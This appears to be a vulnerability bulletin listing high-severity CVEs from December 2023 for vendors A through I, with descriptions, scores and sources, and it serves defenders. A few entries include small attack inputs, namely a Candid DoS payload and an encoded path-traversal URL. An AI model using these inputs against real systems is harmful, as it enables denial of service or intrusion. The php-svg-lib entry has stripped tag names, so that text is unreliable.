crocoblock — jetblocks_for_elementor Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Crocoblock JetBlocks For Elementor allows Reflected XSS. This issue affects JetBlocks For Elementor: from n/a through 1.3.8. 2023-12-14 7.1 CVE-2023-48756
audit@patchstack.com
dasan_networks — dasan_networks Dasan Networks – W-Web versions 1.22-1.27 – CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) 2023-12-13 9.8 CVE-2023-42495
cna@cyber.gov.il
dedebiz — dedebiz A vulnerability was found in DedeBIZ 6.2 and classified as critical. This issue affects some unknown processing of the file /src/admin/content_batchup_action.php. The manipulation of the argument endid leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247883. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-13 7.2 CVE-2023-6755
cna@vuldb.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain an arbitrary file read vulnerability. A remote attacker could potentially exploit this vulnerability to read arbitrary files from the target system. 2023-12-14 7.5 CVE-2023-48660
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48662
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48663
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48664
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain a command injection vulnerability. A remote malicious user with high privileges could potentially exploit this vulnerability leading to the execution of arbitrary OS commands on the affected system. 2023-12-14 7.2 CVE-2023-48665
security_alert@emc.com
dell — _vapp_manger Dell vApp Manager, versions prior to 9.2.4.x contain an information disclosure vulnerability. A remote attacker could potentially exploit this vulnerability leading to obtain sensitive information that may aid in further attacks. 2023-12-14 7.5 CVE-2023-48671
security_alert@emc.com
dell — poweredge_r660_firmware Dell PowerEdge BIOS contains an improper privilege management security vulnerability. An unauthenticated local attacker could potentially exploit this vulnerability, leading to privilege escalation. 2023-12-08 7.8 CVE-2023-32460
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a DOM-based Cross-Site Scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the injection of malicious HTML or JavaScript code to a victim user’s DOM environment in the browser. Exploitation may lead to information disclosure, session theft, or client-side request forgery. 2023-12-14 8.8 CVE-2023-44286
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 on DDMC contain an OS command injection vulnerability in an admin operation. A local high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the managed system application’s underlying OS with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker on a managed system of DDMC. 2023-12-14 8.2 CVE-2023-48668
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in the CLI. A local low privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application’s underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker. 2023-12-14 7.8 CVE-2023-44277
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an improper access control vulnerability. A local malicious user with low privileges could potentially exploit this vulnerability leading to escalation of privilege. 2023-12-14 7.8 CVE-2023-44285
security_alert@emc.com
dell — powerprotect_dd Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A remote high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application’s underlying OS to bypass security restriction. Exploitation may lead to a system take over by an attacker. 2023-12-14 7.2 CVE-2023-48667
security_alert@emc.com
devolutions — remote_desktop_manager Client side permission bypass in Devolutions Remote Desktop Manager 2023.3.4.0 and earlier on iOS allows an attacker that has access to the application to execute entries in a SQL data source without restriction. 2023-12-12 9.8 CVE-2023-6593
security@devolutions.net
dfinity — candid The Candid library causes a Denial of Service while parsing a specially crafted payload with ’empty’ data type. For example, if the payload is `record { * ; empty }` and the canister interface expects `record { * }` then the Rust candid decoder treats empty as an extra field required by the type. The problem with the type empty is that the candid Rust library wrongly categorizes empty as a recoverable error when skipping the field and thus causing an infinite decoding loop. Canisters using affected versions of candid are exposed to denial of service by causing the decoding to run indefinitely until the canister traps due to reaching maximum instruction limit per execution round. Repeated exposure to the payload will result in degraded performance of the canister. Note: Canisters written in Motoko are unaffected. 2023-12-08 7.5 CVE-2023-6245
6b35d637-e00f-4228-858c-b20ad6e1d07b
dockge.kuma — dockge Uptime Kuma is an easy-to-use self-hosted monitoring tool. Prior to version 1.23.9, the application uses WebSocket (with Socket.io), but it does not verify that the source of communication is valid. This allows third-party websites to access the application on behalf of their client. When connecting to the server using Socket.IO, the server does not validate the `Origin` header, leading to other sites being able to open connections to the server and communicate with it. Other websites still need to authenticate to access most features, however this can be used to circumvent firewall protections made in place by people deploying the application. Without origin validation, JavaScript executed from another origin would be allowed to connect to the application without any user interaction. Without login credentials, such a connection is unable to access protected endpoints containing sensitive data of the application. However, such a connection may allow an attacker to further exploit unseen vulnerabilities of the application. Users with “No-auth” mode configured who are relying on a reverse proxy or firewall to provide protection to the application would be especially vulnerable as it would grant the attacker full access to the application. In version 1.23.9, additional verification of the HTTP Origin header has been added to the socket.io connection handler. By default, if the `Origin` header is present, it would be checked against the Host header. Connection would be denied if the hostnames do not match, which would indicate that the request is cross-origin. Connection would be allowed if the `Origin` header is not present. Users can override this behavior by setting environment variable `UPTIME_KUMA_WS_ORIGIN_CHECK=bypass`. 2023-12-11 8.8 CVE-2023-49805
security-advisories@github.com
dockge.kuma — dockge Uptime Kuma is an easy-to-use self-hosted monitoring tool. Prior to version 1.23.9, when a user changes their login password in Uptime Kuma, a previously logged-in user retains access without being logged out. This behavior persists consistently, even after system restarts or browser restarts. This vulnerability allows unauthorized access to user accounts, compromising the security of sensitive information. The same vulnerability was partially fixed in CVE-2023-44400, but logging existing users out of their accounts was forgotten. To mitigate the risks associated with this vulnerability, the maintainers made the server emit a `refresh` event (clients handle this by reloading) and then disconnecting all clients except the one initiating the password change. It is recommended to update Uptime Kuma to version 1.23.9. 2023-12-11 7.8 CVE-2023-49804
security-advisories@github.com
dompdf — php-svg-lib php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when handling `` tag that references an `` tag, it merges the attributes from the `` tag to the `` tag. The problem pops up especially when the `href` attribute from the `` tag has not been sanitized. This can lead to an unsafe file read that can cause PHAR Deserialization vulnerability in PHP prior to version 8. Version 0.5.1 contains a patch for this issue. 2023-12-12 9.8 CVE-2023-50252
security-advisories@github.com
dompdf — php-svg-lib php-svg-lib is an SVG file parsing / rendering library. Prior to version 0.5.1, when parsing the attributes passed to a `use` tag inside an svg document, an attacker can cause the system to go to an infinite recursion. Depending on the system configuration and attack pattern this could exhaust the memory available to the executing process and/or to the server itself. An attacker sending multiple requests to a system to render the above payload can potentially cause resource exhaustion to the point that the system is unable to handle incoming requests. Version 0.5.1 contains a patch for this issue. 2023-12-12 7.5 CVE-2023-50251
security-advisories@github.com
draytek — vigor167_firmware An OS Command Injection in the CLI interface on DrayTek Vigor167 version 5.2.2, allows remote attackers to execute arbitrary system commands and escalate privileges via any account created within the web interface. 2023-12-09 9.8 CVE-2023-47254
cve@mitre.org
eclipse — memory_analyzer In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition. 2023-12-11 7.1 CVE-2023-6194
emo@eclipse.org
elastic — kibana An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error. Elastic has released Kibana 8.11.1 which resolves this issue. The error message recorded in the log may contain account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users. The issue occurs infrequently, only if an error is returned from an Elasticsearch cluster, in cases where there is user interaction and an unhealthy cluster (for example, when returning circuit breaker or no shard exceptions). 2023-12-13 8 CVE-2023-46671
bressers@elastic.co
elastic — kibana An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error or in the event where debug level logging is enabled in Kibana. Elastic has released Kibana 8.11.2 which resolves this issue. The messages recorded in the log may contain Account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users, Elastic Security package policy objects which can contain private keys, bearer token, and sessions of 3rd-party integrations and finally Authorization headers, client secrets, local file paths, and stack traces. The issue may occur in any Kibana instance running an affected version that could potentially receive an unexpected error when communicating to Elasticsearch causing it to include sensitive data into Kibana error logs. It could also occur under specific circumstances when debug level logging is enabled in Kibana. Note: It was found that the fix for ESA-2023-25 in Kibana 8.11.1 for a similar issue was incomplete. 2023-12-13 8 CVE-2023-46675
bressers@elastic.co
elegant_digital_solutions — commentluv Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv.This issue affects CommentLuv: from n/a through 3.0.4. 2023-12-15 7.2 CVE-2023-49159
audit@patchstack.com
emlog — emlog Emlog version pro2.1.14 was discovered to contain a SQL injection vulnerability via the uid parameter at /admin/media.php. 2023-12-12 7.2 CVE-2023-41623
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains packages, standalone packages, and functions that run SECURITY DEFINER but are inadequately secured against search_path attacks. 2023-12-12 9.8 CVE-2023-41117
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It may allow an authenticated user to bypass authorization requirements and access underlying implementation functions. When a superuser has configured file locations using CREATE DIRECTORY, these functions allow users to take a wide range of actions, including read, write, copy, rename, and delete. 2023-12-12 8.8 CVE-2023-41118
cve@mitre.org
enterprisedb — postgres_advanced_server An issue was discovered in EnterpriseDB Postgres Advanced Server (EPAS) before 11.21.32, 12.x before 12.16.20, 13.x before 13.12.16, 14.x before 14.9.0, and 15.x before 15.4.0. It contains the function _dbms_aq_move_to_exception_queue that may be used to elevate a user’s privileges to superuser. This function accepts the OID of a table, and then accesses that table as the superuser by using SELECT and DML commands. 2023-12-12 8.8 CVE-2023-41119
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a buffer-overflow via the function SetUpPhonemeTable at synthdata.c. 2023-12-12 7.8 CVE-2023-49990
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Underflow via the function CountVowelPosition at synthdata.c. 2023-12-12 7.8 CVE-2023-49991
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c. 2023-12-12 7.8 CVE-2023-49992
cve@mitre.org
espeak-ng — espeak-ng Espeak-ng 1.52-dev was discovered to contain a Buffer Overflow via the function ReadClause at readclause.c. 2023-12-12 7.8 CVE-2023-49993
cve@mitre.org
evershop — evershop An issue in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information and execute arbitrary code via the /deleteCustomer/route.json file. 2023-12-08 9.8 CVE-2023-46498
cve@mitre.org
evershop — evershop Directory Traversal vulnerability in EverShop NPM versions before v.1.0.0-rc.8 allows a remote attacker to obtain sensitive information via a crafted request to the DELETE function in api/files endpoint. 2023-12-08 8.3 CVE-2023-46496
cve@mitre.org
fortinet — fortios A double free in Fortinet FortiOS versions 7.0.0 through 7.0.5, FortiPAM version 1.0.0 through 1.0.3, 1.1.0 through 1.1.1 allows attacker to execute unauthorized code or commands via specifically crafted request. 2023-12-13 8.8 CVE-2023-41678
psirt@fortinet.com
fortinet — fortiportal An improper neutralization of special elements used in a command (‘Command Injection’) vulnerability [CWE-77] in FortiPortal version 7.2.0, version 7.0.6 and below may allow a remote authenticated attacker with at least R/W permission to execute unauthorized commands via specifically crafted arguments in the Schedule System Backup page field. 2023-12-13 8.8 CVE-2023-48791
psirt@fortinet.com
fortinet — fortiproxy A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, FortiOS versions 7.4.0, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiPAM versions 1.0.0 through 1.0.3 allows attacker to execute unauthorized code or commands via specially crafted API requests. 2023-12-13 8.8 CVE-2023-36639
psirt@fortinet.com
fortinet — fortitester An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in the command line interpreter of FortiTester 2.3.0 through 7.2.3 may allow an authenticated attacker to execute unauthorized commands via specifically crafted arguments when running execute restore/backup. 2023-12-13 7.8 CVE-2023-40716
psirt@fortinet.com
fortinet — fortiwlm An improper neutralization of special elements used in an os command (‘os command injection’) in Fortinet FortiWLM version 8.6.0 through 8.6.5 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters. 2023-12-13 8.8 CVE-2023-48782
psirt@fortinet.com
fortinet — multiple_products A cross-site request forgery (CSRF) in Fortinet FortiVoiceEnterprise version 6.4.x, 6.0.x, FortiSwitch version 7.0.0 through 7.0.4, 6.4.0 through 6.4.10, 6.2.0 through 6.2.7, 6.0.x, FortiMail version 7.0.0 through 7.0.3, 6.4.0 through 6.4.6, 6.2.x, 6.0.x FortiRecorder version 6.4.0 through 6.4.2, 6.0.x, 2.7.x, 2.6.x, FortiNDR version 1.x.x allows a remote unauthenticated attacker to execute commands on the CLI via tricking an authenticated administrator to execute malicious GET requests. 2023-12-13 8.3 CVE-2022-27488
psirt@fortinet.com
franklin-electric — system_sentinel_anyware Franklin Fueling Systems System Sentinel AnyWare (SSA) version 1.6.24.492 is vulnerable to Session Fixation. The ‘sid’ parameter in the group_status.asp resource allows an attacker to escalate privileges and obtain sensitive information. 2023-12-08 9.8 CVE-2023-48929
cve@mitre.org
frauscher — frauscher_diagnostic_system_102 This vulnerability allows a remote attacker with low privileges to misuse Improper Control of Generation of Code (‘Code Injection’) to gain full control of the affected device. 2023-12-11 8.8 CVE-2023-5500
info@cert.vde.com
gitlab — gitlab An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. 2023-12-15 7.4 CVE-2023-6680
cve@gitlab.com
gl-inet — gl-ar300m_firmware In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality. 2023-12-12 9.8 CVE-2023-46454
cve@mitre.org
gl-inet — gl-ar300m_firmware In GL.iNET GL-AR300M routers with firmware 3.216 it is possible to inject arbitrary shell commands through the OpenVPN client file upload functionality. 2023-12-12 9.8 CVE-2023-46456
cve@mitre.org
gl-inet — gl-ar300m_firmware In GL.iNET GL-AR300M routers with firmware v4.3.7 it is possible to write arbitrary files through a path traversal attack in the OpenVPN client file upload functionality. 2023-12-12 7.5 CVE-2023-46455
cve@mitre.org
glpi — glpi GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, GLPI inventory endpoint can be used to drive a SQL injection attack. Version 10.0.11 contains a patch for the issue. As a workaround, disable native inventory. 2023-12-13 8.6 CVE-2023-46727
security-advisories@github.com
glpi — glpi GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, on PHP 7.4 only, the LDAP server configuration form can be used to execute arbitrary code previously uploaded as a GLPI document. Version 10.0.11 contains a patch for the issue. 2023-12-13 7.2 CVE-2023-46726
security-advisories@github.com
google — android In dhcp4_SetPDNAddress of dhcp4_Main.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 9.8 CVE-2023-48423
dsap-vuln-management@google.com
google — android Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue. 2023-12-08 8.8 CVE-2023-45866
cve@mitre.org
google — android In ProtocolNetAcBarringInfo::ProtocolNetAcBarringInfo() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48398
dsap-vuln-management@google.com
google — android In ppcfw_enable of ppcfw.c, there is a possible EoP due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48402
dsap-vuln-management@google.com
google — android In sms_DecodeCodedTpMsg of sms_PduCodec.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure if the attacker is able to observe the behavior of the subsequent switch conditional with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48403
dsap-vuln-management@google.com
google — android In ProtocolMiscCarrierConfigSimInfoIndAdapter of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48404
dsap-vuln-management@google.com
google — android There is a possible DCK won’t be deleted after factory reset due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48407
dsap-vuln-management@google.com
google — android In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48409
dsap-vuln-management@google.com
google — android In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48410
dsap-vuln-management@google.com
google — android In multiple locations, there is a possible null dereference due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.5 CVE-2023-48416
dsap-vuln-management@google.com
google — android In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/platform/pixel/pixel_gpu_slc.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2023-12-08 7.8 CVE-2023-48421
dsap-vuln-management@google.com
google — chrome Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6702
chrome-cve-admin@google.com
google — chrome Use after free in Blink in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6703
chrome-cve-admin@google.com
google — chrome Use after free in libavif in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted image file. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6704
chrome-cve-admin@google.com
google — chrome Use after free in WebRTC in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6705
chrome-cve-admin@google.com
google — chrome Use after free in FedCM in Google Chrome prior to 120.0.6099.109 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-14 8.8 CVE-2023-6706
chrome-cve-admin@google.com
google — chrome Use after free in CSS in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) 2023-12-14 8.8 CVE-2023-6707
chrome-cve-admin@google.com
google — chromecast_firmware Missing Permission checks resulting in unauthorized access and Manipulation in KeyChainActivity Application 2023-12-11 9.8 CVE-2023-48417
dsap-vuln-management@google.com
google — chromecast_firmware U-Boot shell vulnerability resulting in Privilege escalation in a production device 2023-12-11 9.8 CVE-2023-48424
dsap-vuln-management@google.com
google — chromecast_firmware U-Boot vulnerability resulting in persistent Code Execution 2023-12-11 9.8 CVE-2023-48425
dsap-vuln-management@google.com
google — chromecast_firmware An oversight in BCB handling of reboot reason that allows for persistent code execution 2023-12-11 9.8 CVE-2023-6181
dsap-vuln-management@google.com
gpac — gpac Heap Buffer Overflow vulnerability in GPAC version 2.3-DEV-rev617-g671976fcc-master, allows attackers to execute arbitrary code and cause a denial of service (DoS) via str2ulong class in src/media_tools/avilib.c in gpac/MP4Box. 2023-12-09 9.8 CVE-2023-46932
cve@mitre.org
hanbiro — groupware Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Hanbiro Hanbiro groupware allows Information Elicitation.This issue affects Hanbiro groupware: from V3.8.79 before V3.8.81.1. 2023-12-13 7.5 CVE-2023-45800
vuln@krcert.or.kr
hapifhir — hl7_fhir_core The package-decompression feature in HL7 (Health Level 7) FHIR Core Libraries before 5.6.106 allows attackers to copy arbitrary files to certain directories via directory traversal, if an allowed directory name is a substring of the directory name chosen by the attacker. NOTE: this issue exists because of an incomplete fix for CVE-2023-24057. 2023-12-12 7.5 CVE-2023-28465
cve@mitre.org
hashicorp — vault HashiCorp Vault and Vault Enterprise 1.12.0 and newer are vulnerable to a denial of service through memory exhaustion of the host when handling large unauthenticated and authenticated HTTP requests from a client. Vault will attempt to map the request to memory, resulting in the exhaustion of available memory on the host, which may cause Vault to crash. Fixed in Vault 1.15.4, 1.14.8, 1.13.12. 2023-12-08 7.5 CVE-2023-6337
security@hashicorp.com
heartcombo — devise The Devise gem before 3.5.4 for Ruby mishandles Remember Me cookies for sessions, which may allow an adversary to obtain unauthorized persistent application access. 2023-12-12 7.5 CVE-2015-8314
cve@mitre.org
hitachi_vantara — pentaho_data_integration_&_analytics Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including 8.3.x does not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources. 2023-12-12 8.5 CVE-2023-3517
security.vulnerabilities@hitachivantara.com
hrp2000 — e-hr A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6655
cna@vuldb.com
html-js — doracms DoraCMS v2.1.8 was discovered to re-use the same code for verification of valid usernames and passwords. This vulnerability allows attackers to gain access to the application via a bruteforce attack. 2023-12-08 9.8 CVE-2023-49443
cve@mitre.org
huawei — ar617vw_firmware An improper access control vulnerability exists in a Huawei datacom product. Attackers can exploit this vulnerability to obtain partial device information. 2023-12-12 7.1 CVE-2022-48615
psirt@huawei.com
huawei — ar617vw_firmware A Huawei data communication product has a command injection vulnerability. Successful exploitation of this vulnerability may allow attackers to gain higher privileges. 2023-12-12 7.5 CVE-2022-48616
psirt@huawei.com
hyland — alfresco_content_services An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873. 2023-12-11 8.8 CVE-2023-49964
cve@mitre.org
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piodmgrsu command to obtain elevated privileges. IBM X-Force ID: 267964. 2023-12-13 8.4 CVE-2023-45166
psirt@us.ibm.com
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piobe command to escalate privileges or cause a denial of service. IBM X-Force ID: 267968. 2023-12-13 8.4 CVE-2023-45170
psirt@us.ibm.com
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service. IBM X-Force ID: 267972. 2023-12-13 8.4 CVE-2023-45174
psirt@us.ibm.com
ibm — i_access_client_solutions IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265. 2023-12-14 7.4 CVE-2023-45182
psirt@us.ibm.com
ibm — i_access_client_solutions IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user’s authority. IBM X-Force ID: 268273. 2023-12-14 7.4 CVE-2023-45185
psirt@us.ibm.com
ibm — informix_dynamic_server IBM Informix Dynamic Server 12.10 and 14.10 onsmsync is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. IBM X-Force ID: 250753. 2023-12-09 7.8 CVE-2023-28523
psirt@us.ibm.com
ibm — storage_virtualize IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.3 products use default passwords for a privileged user. IBM X-Force ID: 266874. 2023-12-14 7.5 CVE-2023-43042
psirt@us.ibm.com
iconics — iconics_suite Multiple components of Iconics SCADA Suite are prone to a Phantom DLL loading vulnerability. This issue arises from the applications improperly searching for and loading dynamic link libraries, potentially allowing an attacker to execute malicious code via a DLL with a matching name in an accessible search path. The affected components are: * MMXFax.exe * winfax.dll * MelSim2ComProc.exe * Sim2ComProc.dll * MMXCall_in.exe * libdxxmt.dll * libsrlmt.dll 2023-12-08 7.8 CVE-2023-6061
psirt@paloaltonetworks.com
idemia — sigma_lite_&_lite_+ The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device. 2023-12-15 9.1 CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_&_lite_+ The handler of the retrofit validation command doesn’t properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.1 CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_&_lite_+ During the retrofit validation process, the firmware doesn’t properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.1 CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_&_lite_+ By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it’s possible to cause a permanent denial of service for the terminal. The only way to recover the terminal is by sending back the terminal to the manufacturer. 2023-12-15 7.5 CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imsurajghosh — student_information_system Student Information System v1.0 is vulnerable to an unauthenticated SQL Injection vulnerability on the ‘regno’ parameter of index.php page, allowing an external attacker to dump all the contents of the database and bypass the login control. 2023-12-08 9.8 CVE-2023-5008
help@fluidattacks.com
invisible-island — ncurse NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry(). 2023-12-12 7.5 CVE-2023-50495
cve@mitre.org
itpison — omicard_edm ITPison OMICARD EDM’s file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. 2023-12-15 9.8 CVE-2023-48371
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM’s SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. 2023-12-15 9.8 CVE-2023-48372
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48373
twcert@cert.org.tw
izybat — orange_casiers IzyBat Orange casiers before 20230803_1 allows getEnsemble.php ensemble SQL injection. 2023-12-09 9.1 CVE-2023-50429
cve@mitre.org
